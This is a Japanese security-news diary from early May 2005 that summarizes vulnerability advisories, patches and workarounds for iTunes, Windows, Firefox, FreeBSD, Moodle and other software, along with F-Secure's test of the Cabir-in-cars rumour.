 iTunes 4.8 より前の版に欠陥。 MPEG4 ファイルの処理において buffer overflow する欠陥があり、攻略 MPEG4 ファイルにより任意のコードを実行可能。 Mac OS X 版、Windows 版共にこの欠陥がある。 CVE: CAN-2005-1248

 iTunes 4.8 で修正されている。 Mac OS X 利用者はソフトウェアアップデートからも入手できる……はずなのだが、 今のところ公開されていないようだ。 301596 - iTunes 4.8: Security enhancements (Apple) には「which can be downloaded and installed using Software Update」と明記されているのだが……。 Ray さん情報ありがとうございます。

 Mac OS X 用・Windows 用共に、iTunes 4.8 日本語対応版をダウンロードページから入手できる。

「Web の表示」の脆弱性により、リモートでコードが実行される (894320) (MS05-024)
(Microsoft, 2005.05.11)

 Windows 2000 に欠陥。 Windows 2000のエクスプローラに任意のコードが実行される脆弱性 の話。 CVE: CAN-2005-1191

 修正プログラムがあるので適用すればよい。

追記

トレンドマイクロ、パターンファイル提供サイクルを当面「月、水、金」に変更

 さきほど届いたトレンドマイクロ Support Information(050511)より:

2005年4月29日から、5月中旬までパターンファイルのリリースを月曜日、水曜日、金曜日ととさせていただいておりました。
当面の間、同リリーススケジュールを継続することをお知らせいたします。
「Firefox」に任意コードが実行される脆弱性が存在、近日公開のv1.0.4で修正か
  • Mozilla Foundation セキュリティアドバイザリ 2005-42: 「javascript:」形式の iconURL を通じたコードの実行 (mozilla-japan.org)

    2 つの欠陥があったそうで、

    • 『フレーム内で「javascript:」形式の URL へ履歴を 1 つ戻すことにより、攻撃者は任意のサイトにスクリプトを注入でき』る欠陥。 悪意ある web サイトに cookie を読み取られたりするそうだ。 Firefox だけでなく Mozilla Suite も影響。

      回避策としては、JavaScript を無効にする。

    • 『「javascript:」形式の URL をパッケージのアイコンとして用いることにより、インストール確認ダイアログ上で攻撃者に任意のコード実行を許してしまう』欠陥。こちらは Firefox にのみ存在。 『デフォルトでは、このダイアログの表示が許可されているのは Mozilla Foundation のアップデートサイトだけ』であり、しかも「Mozilla Foundation のサイト」には対抗策が施されたそうだ。

      許可サイトを追加している場合は、それを削除しておいた方がいいようです。

    というわけで、回避するにはやっぱり JavaScript を無効にしましょう。

  • Mozilla Firefox1.0.3に最高レベルの脆弱性 (slashdot.jp)

MPSB05-03 - ColdFusion MX 7 cross-site scripting in default error page
(Macromedia, 2005.05.10)

 ColdFusion MX 7.0 のデフォルト 404 エラーページに XSS 欠陥がある。 patch が用意されているので適用すればよい。

In-depth investigation of the "Cabir-in-Cars" myth
(F-Secure, 2005.05.09)

 「Bluetooth ウイルスがトヨタの Lexus に感染する伝説」を検証するため、 F-Secure が、Lexus と同様の Bluetooth システムを装備するトヨタ Prius をテスト。

 海抜 -42m となる地下室にトヨタ Prius を運び入れ、Cabir.B と Cabir.H ウイルスが感染するかどうかをテスト。感染はしなかったが、感染しようと Cabir が活動すると、 Prius の Bluetooth システムは Bluetooth トラフィックを受け付けなくなった。

 さらに、既知の Bluetooth アタックを実施したところ、画面には

CAUTION:
The transmission [P] lock mechanism is abnormal. Park your car on a flat surface, and fully apply the hand brake.

と表示されてしまった。 テストを繰り返すと再現され、さらに繰り返す (3 回目) と Prius の Bluetooth システムはクラッシュしてしまった。 ……というのは、実はバッテリ低下によるものだった模様で、 バッテリを復旧すると問題なくなったそうだ。

 F-Secure は、さらに 1 つのマイナーな欠陥 (不正な電話名によりオンボードディスプレイがフリーズする) を発見したが、 Prius の Bluetooth システムは携帯電話や PC よりも遥かに安定していると結論づけている。

 関連: F-Secure、「Cabirが車に感染」の噂を実地検証 (ITmedia, 2005.05.10)


2005.05.10

グーグルのWeb Accelerator、プライバシーやセキュリティの問題続出
(CNET, 2005.05.09)

 けっきょくのところは、いささかお行儀が悪い (?) 公開 proxy なわけで……。 気になる場合は Web Accelerator ホスト (ってどこ?) へのアクセスを禁止した方がよいかも。また Web Accelerator ホストからのアクセスを禁止したい場合もあるでしょうね。

 Web Accelerator のページを見ると、「We have currently reached our maximum capacity of users and are actively working to increase the number of users we can support」と書かれているなあ (11:05 AM)。


2005.05.09

米AppleがMac OS X用セキュリティ修正を公開,「すべてのユーザーが適用を」
(日経 IT Pro, 2005.05.06)

 Security Update 2005-005 が出たので適用しましょう話。関連:

 CVE とか:

 なお、CAN-2005-1271 (iDEFENSE Security Advisory 05.04.05: Apple Mac OS X vpnd Server_id Buffer Overflow Vulnerability) は、Apple 的には Mac OS X 10.3.9 で修正していることになっているのかな。

Tiger:悪意のあるサイトが勝手にウィジェットをインストールする
(奥村晴彦のWiki, 2005.05.09)

 Mac OS X 10.4 'Tiger' 上の Safari に欠陥。攻略 web ページにアクセスすると、 ダッシュボードウィジェットが自動的にダウンロードされ、さらに自動的にインストールされてしまう。

 修正版はまだない。回避するには、Safari の環境設定で「ダウンロード後,"安全な"ファイルを開く」のチェックを外す。 標準ではチェックが入っているので注意。

 奥村さん情報ありがとうございます。

2005.05.21 追記:

 Mac OS X 10.4.1 で修正されたようです。 About the security content of the Mac OS X 10.4.1 Update も参照。

「Firefox」に任意コードが実行される脆弱性が存在、近日公開のv1.0.4で修正か
(窓の杜, 2005.05.09)

 このあたりの話。任意のコードを実行させることが可能な模様。

 修正版はまだない。回避するには JavaScript を無効にする。

2005.05.11 追記:

2005.05.12 追記:

 今回の欠陥が修正された Firefox 1.0.4 が登場しています (リリースノート)。しかし Firefox 1.0.4 日本語版は残念ながらまだ提供されていないようです。

2005.05.13 追記:

 今回の欠陥が修正された Mozilla 1.7.8 も登場しています。 また日本語版の Firefox 1.0.4 も登場しています。 小出さん情報ありがとうございます。 Mozilla 1.7.8 の日本語版は、まだないようだ。

2005.05.21 追記:

 Mozilla 1.7.8 日本語版が登場しています。小出さん情報ありがとうございます。

追記

FreeBSD に 3 つの欠陥

 FreeBSD-SA-05:08.kmem [REVISED] が出ています。RELENG_4_11 で比較すると、 新たに src/sys/kern/uipc_usrreq.c と src/sys/netinet/tcp_subr.c が修正されています。 旧版に従って kernel を更新した人は、またまた kernel を更新する必要があるようです。


2005.05.08

追記

FreeBSD に 3 つの欠陥

 FreeBSD-SA-05:06.iir - Incorrect permissions on /dev/iir [REVISED] が出ています。

phpBB 2.0.15 released
(phpbb.com, 2005.05.08)

 phpBB 2.0.15 出ました。重大なセキュリティ欠陥の修正を含むそうです。 phpBB 2.0.14 以前を利用している場合は、とりいそぎ、示されている変更を施してください (phpBB 2.0.15 では変更済です)。


2005.05.07

Ethereal 0.10.11 released
(ethereal.com, 2005.05.04)

 Ethereal 0.10.11 登場。0.10.10 以前にあった複数の欠陥が修正されている。 enpa-sa-00019: Multiple problems in Ethereal versions 0.8.14 to 0.10.10 (ethereal.com) も参照。 CVE: CAN-2005-1456 CAN-2005-1457 CAN-2005-1458 CAN-2005-1459 CAN-2005-1460 CAN-2005-1461 CAN-2005-1462 CAN-2005-1463 CAN-2005-1464 CAN-2005-1465 CAN-2005-1466 CAN-2005-1467 CAN-2005-1468 CAN-2005-1469 CAN-2005-1470

 関連:


2005.05.06

Moodle Security Center: Security bug with admin/delete.php
(moodle.org, 2005.05.06)

 e-Learning ソフト Moodle1.4.2 以前 最新リリース 1.4.4 や開発版 1.5dev を含む全バージョンに欠陥。悪意ある利用者が全てのコースファイルを削除できてしまう。

 admin/delete.php を削除することでこの欠陥を回避できる。 また、Moodle 1.4.3 で修正されている。 最新の CVS 版では修正されている。

 奥村さん情報ありがとうございます。

トレンドマイクロ、パターンファイル提供サイクルを当面「月、水、金」に変更
(ITmedia, 2005.05.06)

 知らなかったぞ……。大型連休期間(4/29〜5/8)における、トレンドマイクロ製品のパターンファイルアップデートに関するご案内 (トレンドマイクロ) より:

このため、2005年4月29日より、パターンファイルのリリース(※2)を月曜日、水曜日、金曜日へ変更し、品質の改善と向上に努めてまいります。プロセス改善の結果に問題が無いと判断いたしました時点(5月中旬を目処)で、速やかに通常のリリースサイクルの体制を整えパターンファイルをリリースさせていただきます。

※2 ウイルスアラートの発令などの場合には、この限りではございません。

 こういう話は、別のサポート情報にするべきだと思うけどなあ……。 大型連休期間と関係ないじゃん。

2005.05.11 追記:

 さきほど届いたトレンドマイクロ Support Information(050511)より:

2005年4月29日から、5月中旬までパターンファイルのリリースを月曜日、水曜日、金曜日ととさせていただいておりました。
当面の間、同リリーススケジュールを継続することをお知らせいたします。

追記

NISCC Vulnerability Advisory ICMP - 532967: Vulnerability Issues in ICMP packets with TCP payloads

 SYM05-008: シマンテックのセキュリティ・ゲートウェイ ICMP にサービス拒否の危険性 (シマンテック, 2005.05.02)。 以下のシマンテック製品に欠陥があるそうだ。

Symantec Gateway Security 5400 Series, v2.x
Symantec Gateway Security 5300 Series, v1.0
Symantec Enterprise Firewall, v7.0.x (Windows 版および Solaris 版)
Symantec Enterprise Firewall v8.0 (Windows 版および Solaris 版)
Symantec VelociRaptor, Model 1100/1200/1300 v1.5
Symantec Gateway Security 300 Series (すべてのファームウェア・バージョン)
Symantec Gateway Security 400 Series (すべてのファームウェア・バージョン)
Symantec Firewall/VPN Appliance 100/200/200R (すべてのファームウェア・バージョン)
Nexland ISB SOHO Firewall Appliances (すべてのファームウェア・バージョン)
Nexland Pro Series Firewall Appliances

 このうち修正版があるのは Symantec Gateway Security 300 Series、Symantec Gateway Security 400 Series だけで、他については開発中だそうだ。

Alert: "swapfile is infected with Hacktool.Underhand"
(symantec, 2005.05.05)

 Mac 版 Norton AntiVirus で「swapfile が Hacktool.Underhand に感染している」という誤検出が、次の条件で発生する模様。

 このとき「隔離」を選択すると kernel panic してしまう (そりゃそうだろう)。

 ウイルス定義ファイルを更新することで対応できるそうだ。

 なお、「隔離」したファイルは戻さずそのまま削除しましょう、だそうだ。 また Norton AntiVirus for Macintosh 7.x + Mac OS 9 の組みあわせではこの誤検出は発生しないそうだ。

 北島さん情報ありがとうございます。

マイクロソフト セキュリティ情報の事前通知
(Microsoft, 2005.05.06)

 OS 部分で「重要」が 1 件、だそうです。

FreeBSD に 3 つの欠陥
(FreeBSD-security ML, 2005.05.06)

 最新の RELENG_4, RELENG_4_10, RELENG_4_11, RELENG_5, RELENG_5_3, RELENG_5_4 では修正されている。また、まもなくリリースされるはずの 5.4-RELEASE にはこれらの欠陥はない。

2005.05.06 追記:

 FreeBSD-SA-05:08.kmem で示されている patch は変だ、という指摘が: Re: FreeBSD Security Advisory FreeBSD-SA-05:08.kmem

2005.05.08 追記:

 FreeBSD-SA-05:06.iir [REVISED] が出ています。

2005.05.09 追記:

 FreeBSD-SA-05:08.kmem [REVISED] が出ています。RELENG_4_11 で比較すると、 新たに src/sys/kern/uipc_usrreq.c と src/sys/netinet/tcp_subr.c が修正されています。 旧版に従って kernel を更新した人は、またまた kernel を更新する必要があるようです。


2005.05.05


2005.05.04


2005.05.03

追記

電子申請 行政ソフトに不具合

 電子申請システムの点検指示 (NHK, 2005.04.29)。すでに消えてしまっている (T_T) ので、以下に全文引用させていただきます。

総務省は行政が欠陥のあるソフトを配布していたことは問題だとして、全国の自治体に対し、同じような欠陥のあるソフトを配布していないかどうか来月13日までに点検するよう指示しました。また、内閣官房情報セキュリティーセンターでも各省庁に対し、全国の出先機関が使っている電子申請ソフトの安全性を点検するよう指示しました。

 まだ全ての対応が終ったわけではない、ということなんでしょうか。 その割には、いろんな自治体が勝手に情報を出してしまっていて、なかなかアレな気がします。 インシデント対応手順が不明確 and/or 不徹底ということなんでしょうか。

 ところで、ソフトウエア等の脆弱性関連情報に関する届出状況 [2005年第1四半期(1月〜3月)] (IPA ISEC) にこんな文章があるのですが、

2005年第1四半期の届出事例として、Javaアプリケーション(Javaアプレット)のインストールプログラム等がインストール時にクライアントPCのJava環境のセキュリティポリシーを書換えてしまい、結果として、クライアントPCのセキュリティレベルを低下させてしまう、というものが複数ありました。(7)
中略
(7) これらは、クライアントPCにインストールするソフトウエアですが、ウェブアプリケーションを使うためのものであり、そのウェブアプリケーションと独立して起動され、使用されるものではないため、ウェブアプリケーションの一部として捉え、ウェブアプリケーションの脆弱性関連情報の届出として取扱いました。

セキュリティ問題の詳細説明 (やまなし申請・予約ポータルサイト) に

 2005年2月16日の10時33分に、IPA(独立行政法人情報処理推進機構)のセキュリティセンタから、e-やまなしサポートセンタ宛に「やまなし申請・予約ポータルサイト」の「お使いのPCの設定」-「ユーザ設定ファイル」でファイルの組み込みを行った場合、セキュリティ上の問題が生じる可能性があるというご指摘を頂きました。
(中略)
セキュリティ問題
 電子申請サービスの電子署名を行う場合には、お使いのパソコン上にある資源(署名に必要なファイル等)の利用を行うために、ユーザ設定ファイルの組み込みを行っていただいています。
 そのユーザ設定ファイルの1つとして、「java.policy」ファイルの組み込みを行っていただいていますが、2005年2月16日以前の「java.policy」ファイルの記述内容に誤りがありました。
 2005年2月16日以前にユーザ設定ファイルの組み込みを行ったパソコンで、悪意のあるサイトを訪れた場合に、ユーザ名、ローカルファイルの盗み出し・破壊、任意コードの実行、ウィルスへの感染等が発生する可能性があることが判明しました。

とあるので、これがその話なんじゃないのかなーという気がします。

 しかしこの話の場合、影響範囲が当該 web サイトに限られるわけではないのですから、「ウェブアプリケーションの脆弱性関連情報の届出として取扱いました」というのはちょっとまずいのではないかと思います。


2005.05.02

いろいろ
(various)

SMS SMTP 4.1.4 ビルド 30 を導入すると CPU 使用率が 100% になる
(シマンテック, 2005.05.02)

 Symanatec Mail Security for SMTP (SMS SMTP) 4.1.4 ビルド 30 で、 「ある特定の日本語で記述された電子メールを受信する」 と CPU 100% となるそうだ。 以前のバージョンにダウングレードすることにより回避できるそうだ。

PKIよくある勘違い(9)「『詳細設定』ボタンで証明書の使用目的を制限できる」
(高木浩光@自宅の日記, 2005.04.10)

 以下については、今だに直っていないようです。

 MS の UI がわかりにくすぎ、という話はありますが……。

追記

Googleのスペルミス悪用サイト、アクセスするとPC乗っ取り

 Handler's Diary April 30th 2005 (SANS ISC) によると、当該ドメインの DNS エントリが削除された模様。 googkle.com の他にもいろいろあったみたいです。

特定のハードディスクを搭載するHP xw WorkstationシリーズでOSの起動時や動作中にハングアップ等が発生することがあります
(HP, 2005.04.28)

 HP Workstation xw4100, 4200, 5000, 6000, 6200, 8000, 8200 に塔載されている SCSI HDD に欠陥があり、起動できなかったりブルー画面になったりする。

 ハードディスクのファームウェアを更新することで対応できる。 更新ツール (HP) が公開されている。

 更新ツールのページによると、 問題の SCSI HDD は Seagate Cheetah 10K.6 と 15K.3 だそうで。これか?: Ultra 320 Time-Out Firmware Upgrade (Seagate)。


2005.05.01

追記

mixiにCSRF脆弱性「ぼくはまちちゃん!」トラップ

 クロスサイトリクエストフォージェリ(CSRF)の正しい対策方法 (高木浩光@自宅の日記, 2005.04.27)

メディア・JRなどLAN障害、ウイルス対策で不具合

 関連記事:


[セキュリティホール memo]
私について